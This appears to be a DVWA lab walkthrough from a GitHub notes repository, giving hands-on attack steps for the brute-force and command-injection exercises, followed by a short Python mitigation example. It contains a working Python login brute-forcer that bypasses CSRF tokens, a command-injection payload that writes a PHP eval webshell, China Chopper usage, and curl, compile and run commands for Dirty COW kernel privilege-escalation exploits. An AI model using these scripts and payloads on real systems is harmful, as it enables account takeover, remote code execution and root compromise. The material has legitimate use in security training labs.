Link: https://github.com/dhgdhg/DVWA-Note
Brute Force
low: ZAP or Burp Suite
medium: ZAP or Burp Suite
high:
<details> <summary>Brute forcing with Python</summary>

```python
import requests
import re


def fun():
    username_file_path = 'E:username.txt'
    password_file_path = 'E:password.txt'
    host = '192.168.119.131'
    cookie = 'security=high; PHPSESSID=kvuut861afcfg8k4fe5bhnrj01'
    headers = {
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
        'DNT': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Referer': 'https://{}/DVWA/vulnerabilities/brute/'.format(host),
        'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
        'Cookie': cookie,
        'Host': host
    }
    session = requests.session()
    # Load the form once to read the initial CSRF token (user_token)
    response = session.get(
        'http://{}/DVWA/vulnerabilities/brute/'.format(host), headers=headers)
    user_token = re.search(
        '<input type=.hidden. name=.user_token. value=.(.*?). />',
        response.text).groups()[0].strip()
    with open(username_file_path, 'r') as usernames:
        for username in usernames:
            username = username.strip()
            with open(password_file_path, 'r') as passwords:
                for password in passwords:
                    password = password.strip()
                    url = 'http://{}/DVWA/vulnerabilities/brute/?username={}&password={}&Login=Login&user_token={}'.format(
                        host, username, password, user_token)
                    response = session.get(url, headers=headers)
                    if 'Welcome' in response.text:
                        print('-----------------------')
                        print('\n\n', username, password, '\n\n')
                        print('-----------------------')
                        return
                    else:
                        print(username, password)
                    # The page returns a new user_token with every response
                    user_token = re.search(
                        '<input type=.hidden. name=.user_token. value=.(.*?). />',
                        response.text).groups()[0].strip()


if __name__ == "__main__":
    fun()
```

</details>
Command Injection
- low:
- Write a one-line webshell
127.0.0.1&&echo '<?php eval($_POST["cmd"]) ?>' > e1.php
- Use Caidao (菜刀, China Chopper)
- Open a terminal in Caidao
- Check the system version
uname -a
cat /etc/issue
- Privilege escalation
- Linux reverse shell
- Caidao can drag and drop files onto the test server
- https://github.com/wantongtang/pyshell/blob/master/back.py
curl https://www.exploit-db.com/download/40847 -k > 40847.cpp
- If curl cannot fetch it, click the link to download it with a browser, then drag it in through Caidao
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow -s
- If it errors when run, execute this inside the virtual machine:
sudo mv /opt/lampp/lib/libstdc++.so.6 /opt/lampp/lib/libstdc++.so.6.orig
- Privilege escalation succeeded
- If privilege escalation fails, try another Dirty COW variant
https://github.com/SecWiki/linux-kernel-exploits/tree/master/2016/CVE-2016-5195
- 40616.c
gcc 40616.c -o cc -pthread;./cc
- It may print errors, but they do not affect execution
- Vulnerability detection tool: https://github.com/mzet-/linux-exploit-suggester
- Linux reverse shell
- Write a one-line webshell
- medium
- Same as above
- high
- Same as above
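The low-level injection above works because the ping target is handed to a shell unchanged, so `&&` starts a second command that writes the webshell. As an added example (not from these notes or from DVWA), the Python below shows the server-side mitigation: accept only an IP literal and pass it to ping as one argv element with no shell. The sample targets, including the payload form from the notes, are constructed inputs; restricting targets to IP literals (no hostnames) is a design choice made here.

```python
import ipaddress
import re
import subprocess

# Constructed sample inputs: a benign target, the webshell-writing payload
# form from the notes above, and a hostname with a command separator.
SAMPLE_TARGETS = [
    "127.0.0.1",
    "127.0.0.1&&echo '<?php eval($_POST[\"cmd\"]) ?>' > e1.php",
    "localhost; id",
]

# Shell metacharacters that should never appear in a ping target.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r\\'\"]")


def validate_target(raw):
    """Return the canonical IP string if raw is a single IP literal, else None.

    The metacharacter check is belt-and-braces: ipaddress.ip_address already
    rejects anything that is not a parseable IPv4/IPv6 address, so the `&&`
    chain in the payload never survives validation.
    """
    candidate = raw.strip()
    if SHELL_META.search(candidate):
        return None
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return None


def build_ping_argv(raw):
    """Build the argv list for ping, or raise ValueError for rejected input.

    Because the list is passed to subprocess without shell=True, the target
    is a single argument to ping and cannot start another command.
    """
    target = validate_target(raw)
    if target is None:
        raise ValueError("rejected ping target: %r" % raw)
    return ["ping", "-c", "4", target]


def safe_ping(raw, timeout=10):
    """Run ping for a validated target and return its combined output."""
    completed = subprocess.run(build_ping_argv(raw), capture_output=True,
                               text=True, timeout=timeout)
    return completed.stdout + completed.stderr
```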
- low: